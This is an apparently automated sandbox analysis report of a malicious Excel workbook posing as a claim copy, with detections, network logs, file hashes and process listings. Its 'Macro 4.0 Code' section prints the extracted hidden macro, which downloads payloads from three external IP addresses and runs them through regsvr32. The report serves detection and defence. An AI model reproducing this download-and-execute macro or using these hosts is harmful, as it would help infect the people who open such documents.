Windows Analysis Report ClaimCopy-1848214335-12022021.xlsb
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Jbx Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found protected and hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Macro extractor: | ||
Source: | Macro extractor: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Virustotal: |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Binary or memory string: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: |
Source: | Code function: |
Source: | Code function: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting2 | Path Interception | Process Injection2 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Virtualization/Sandbox Evasion1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection2 | NTDS | File and Directory Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting2 | LSA Secrets | System Information Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
9% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown | |
false |
| unknown | |
false |
| unknown | |
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| low | ||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
45.142.211.62 | unknown | Russian Federation | 208861 | RACKTECHRU | false | |
158.69.133.78 | unknown | Canada | 16276 | OVHFR | false | |
185.82.126.78 | unknown | Latvia | 52173 | MAKONIXLV | false |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 532757 |
Start date: | 02.12.2021 |
Start time: | 17:19:36 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 21s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | ClaimCopy-1848214335-12022021.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLSB@13/5@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
17:20:45 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
45.142.211.62 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
158.69.133.78 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
RACKTECHRU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
OVHFR | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85681 |
Entropy (8bit): | 7.915850776614707 |
Encrypted: | false |
SSDEEP: | 1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit |
MD5: | 4F100E2CEFED046B44EC799015B454EF |
SHA1: | 5149E5D1B5212C77B3548914E9B47D67B4BEA574 |
SHA-256: | D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C |
SHA-512: | 153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 99419 |
Entropy (8bit): | 7.830672226396987 |
Encrypted: | false |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUyRwk:I3c6EehCfCZpUHKGXbBKsiip |
MD5: | B2341D56AF5EF9A35E595C7B5B7378FF |
SHA1: | F07ADA669C9C00167F18C2FC2C23F0EB73D90073 |
SHA-256: | 98462FE70DDA1E4D3601ADC6F7E1BB5D73BB9ED615B8B70C9966B36BD6845D38 |
SHA-512: | A2ED4FD7496371D0E9C5527F7969BE6C6C2F2D5371BDCADEEB35FE0A712E310C4AD6DC05F5B3FE1FD9F235306196987F0037B577D6937E6899C133F06106DB11 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 99419 |
Entropy (8bit): | 7.830672226396987 |
Encrypted: | false |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUyRwk:I3c6EehCfCZpUHKGXbBKsiip |
MD5: | B2341D56AF5EF9A35E595C7B5B7378FF |
SHA1: | F07ADA669C9C00167F18C2FC2C23F0EB73D90073 |
SHA-256: | 98462FE70DDA1E4D3601ADC6F7E1BB5D73BB9ED615B8B70C9966B36BD6845D38 |
SHA-512: | A2ED4FD7496371D0E9C5527F7969BE6C6C2F2D5371BDCADEEB35FE0A712E310C4AD6DC05F5B3FE1FD9F235306196987F0037B577D6937E6899C133F06106DB11 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.831014565818071 |
TrID: |
|
File name: | ClaimCopy-1848214335-12022021.xlsb |
File size: | 99677 |
MD5: | 08dbf91f6a89fdb8dcd18dfe657147f3 |
SHA1: | 990b5abe4b156c201174e412aca4b3dcb372070c |
SHA256: | 29db2ea5fcb6ab8fca34ee80ae3a9c2ebda224ee631d754208ec53bc2b610267 |
SHA512: | e2b04a6f333013fbd641d32f1abb99ec92d30a38d8685a83801d8f75627ba4e3d35cf261aec6cf2100d9bc23e8aeb6cd735104855309b46a82c7546eca83944b |
SSDEEP: | 1536:xMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:dc6EehCfCZpUHKGXbBKsiiOp |
File Content Preview: | PK..........!...~.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2ea8aa4b4b4b4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "ClaimCopy-1848214335-12022021.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0) 9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0) 10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0) 11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0) 12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0) 13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0) 15,6,=EXEC("regsvr32 C:\ProgramData\Volet1.ocx") 16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx") 17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx") 18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx") 19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx") 20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx") 23,6,=HALT()
1,1,523 4,9,34543 4,12,43 5,2,ui 5,9,7 5,14,43 6,14,36 7,0,ug 7,1,еу5цу5 8,9,34 8,10,5 9,1,y 9,16,346 10,7,rt 10,8,345 10,9,u 11,2,23 11,7,ertertyh57s5ry 11,11,5 11,12,35 12,1,65 12,2,7 12,9,r67 13,2,mfy 13,7,65 13,10,7 13,14,34 13,15,543 14,0,uh 14,1,y 15,0,7 15,7,65 15,10,ae46 16,2,d7 16,3,uRl 17,3,="Mon" 17,9,dt 17,10,6 17,12,u 17,13,5 18,3,="URLDownloadTo" 18,8,yu 18,10,sb 18,14,5 19,3,="JJCCBB" 19,7,f 20,0,7 20,1,7 20,4,185.82.126.78/ 20,7,523 20,8,u 21,0,md 21,4,158.69.133.78/ 21,6,=RANDBETWEEN(142536473,988879789754) 21,9,s 21,11,m 22,1,7 22,4,45.142.211.62/ 22,6,=".dat" 22,8,6 23,4,45.142.211.62/ 23,6,=".dat2" 23,11,4 23,15,46 24,4,185.82.126.78/ 24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9) 24,8,23 24,14,6 24,15,43 25,1,567 25,4,158.69.133.78/ 25,10,23 25,13,5 28,2,756 37,6,=GOTO(Tiposa1!G8)
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
12/02/21-17:20:33.818022 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
12/02/21-17:20:34.462758 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
12/02/21-17:20:37.721969 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
12/02/21-17:20:37.918223 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
12/02/21-17:20:38.051804 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
12/02/21-17:20:43.124756 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 2, 2021 17:20:33.611210108 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:33.678101063 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:20:33.678247929 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:33.678940058 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:33.745141983 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:20:33.818022013 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:20:33.818130016 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:33.840384960 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:20:33.947674990 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:20:33.947779894 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:20:33.948457956 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:20:34.055716991 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:20:34.462758064 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:20:34.462909937 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:20:34.480212927 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.489062071 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.526045084 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:20:37.526228905 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.526890993 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.563458920 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:20:37.721968889 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:20:37.722197056 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.728193045 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.764781952 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:20:37.918222904 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:20:37.918462038 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:20:37.920181036 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:37.984700918 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:20:38.051804066 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:20:38.052022934 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:20:38.055299044 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:20:38.162579060 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:20:43.124756098 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:20:43.124927044 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:21:42.917769909 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:21:42.917872906 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:21:43.058012962 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:21:43.058257103 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:21:48.124285936 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 17:21:48.124485970 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:22:30.290991068 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 17:22:30.291338921 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 17:22:30.291645050 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 17:22:30.327723026 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 17:22:30.357023954 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 17:22:30.398499966 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 185.82.126.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 17:20:33.678940058 CET | 0 | OUT | |
Dec 2, 2021 17:20:33.818022013 CET | 1 | IN | |
Dec 2, 2021 17:20:37.920181036 CET | 5 | OUT | |
Dec 2, 2021 17:20:38.051804066 CET | 6 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 158.69.133.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 17:20:33.948457956 CET | 1 | OUT | |
Dec 2, 2021 17:20:34.462758064 CET | 2 | IN | |
Dec 2, 2021 17:20:38.055299044 CET | 7 | OUT | |
Dec 2, 2021 17:20:43.124756098 CET | 7 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 45.142.211.62 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 17:20:37.526890993 CET | 3 | OUT | |
Dec 2, 2021 17:20:37.721968889 CET | 4 | IN | |
Dec 2, 2021 17:20:37.728193045 CET | 4 | OUT | |
Dec 2, 2021 17:20:37.918222904 CET | 5 | IN |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 17:20:20 |
Start date: | 02/12/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13ff60000 |
File size: | 28253536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:20:34 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff350000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:20:34 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff350000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
